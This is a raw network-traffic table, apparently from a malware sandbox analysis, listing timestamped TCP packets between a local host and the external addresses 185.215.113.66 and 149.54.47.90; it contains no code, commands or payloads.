                                                                                                                                                        Oct 26, 2024 07:26:20.939373970 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.939383030 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.939394951 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.939409971 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.939429045 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.940258026 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.940310955 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.943948984 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.943964958 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.943974018 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.944029093 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091181993 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091202021 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091248989 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091284037 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091372013 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091388941 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091406107 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091414928 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091423988 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091439962 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091444969 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091444969 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091464996 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091484070 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091805935 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091821909 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091835976 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.091849089 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091864109 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.091883898 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092119932 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092134953 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092159986 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092159986 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092175007 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092179060 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092195988 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092202902 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092212915 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092212915 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092236996 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092255116 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092881918 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092897892 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092914104 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092926979 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092941999 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092962980 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.092979908 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.092995882 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093009949 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093019962 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.093028069 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093041897 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.093051910 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.093079090 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.093780041 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093796015 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093810081 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093827009 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.093832970 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093837976 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.093848944 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093864918 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093871117 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.093880892 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.093890905 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.093928099 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.094660997 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094677925 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094696045 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094707966 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.094739914 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.094770908 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094785929 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094800949 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094810963 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.094816923 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.094840050 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.094867945 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.095556974 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.095582962 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:21.095607042 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:21.095624924 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:25.246774912 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:25.252224922 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:25.627481937 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:25.627582073 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:27.747546911 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:30.989178896 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:30.994569063 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:30.994654894 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:30.994864941 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.000217915 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911458969 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911535025 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911545992 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911556959 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911569118 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911587954 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911590099 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.911601067 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911608934 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911621094 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911623001 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.911633015 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.911695004 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.911695004 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.913506985 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.913506985 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.917013884 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.917043924 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.917069912 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.917133093 CEST8049771185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:31.917160034 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.917217970 CEST4977180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:32.918739080 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:32.925472021 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:32.925554991 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:32.925695896 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:32.931099892 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.654453993 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:33.659785986 CEST4050049788149.54.47.90192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.659888029 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:33.661674023 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:33.666906118 CEST4050049788149.54.47.90192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.666954041 CEST4978840500192.168.2.5149.54.47.90
                                                                                                                                                        Oct 26, 2024 07:26:33.672313929 CEST4050049788149.54.47.90192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827378988 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827410936 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827430964 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827442884 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827462912 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827471018 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827477932 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827490091 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827513933 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827523947 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827524900 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827538013 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.827553034 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827562094 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827593088 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.832870007 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.832880974 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.832890987 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.832945108 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.982999086 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983017921 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983030081 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983043909 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983055115 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983076096 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983098030 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983129978 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983275890 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983289003 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983299971 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983318090 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983335018 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983335018 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983365059 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983921051 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983932972 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983944893 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983964920 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983968973 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.983973026 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.983989954 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984010935 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984034061 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984749079 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984801054 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984844923 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984858036 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984870911 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984884977 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.984894037 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984903097 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.984926939 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.985647917 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.985658884 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.985671043 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.985683918 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.985716105 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.985728979 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.988389015 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.988399982 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:33.988440990 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137038946 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137054920 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137089968 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137101889 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137108088 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137114048 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137149096 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137149096 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137181044 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137193918 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137206078 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137214899 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137226105 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137238026 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137247086 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137250900 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137271881 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137290955 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137746096 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137790918 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137793064 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137815952 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137868881 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137868881 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137891054 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137903929 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137908936 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.137934923 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.137952089 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138108015 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138150930 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138160944 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138176918 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138219118 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138247013 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138259888 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138272047 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138289928 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138307095 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138622999 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138636112 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138648033 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138665915 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138681889 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138708115 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138720989 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138731956 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138744116 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138755083 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138792038 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138823986 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138838053 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138849020 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138860941 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.138870955 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.138906956 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.139549971 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139569044 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139581919 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139610052 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.139646053 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.139657021 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139668941 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139681101 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139693975 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139705896 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.139723063 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.139739990 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.139743090 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139755011 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139766932 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.139789104 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.139811039 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.140402079 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.140414953 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.140427113 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.140445948 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.140450954 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.140489101 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.290965080 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.290986061 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291032076 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291035891 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291068077 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291075945 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291084051 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291096926 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291109085 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291121006 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291150093 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291204929 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291253090 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291263103 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291309118 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291367054 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291383982 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291438103 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291435003 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291476965 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291488886 CEST4978480192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:34.291490078 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291511059 CEST8049784185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:34.291515112 CEST4978480192.168.2.5185.215.113.66
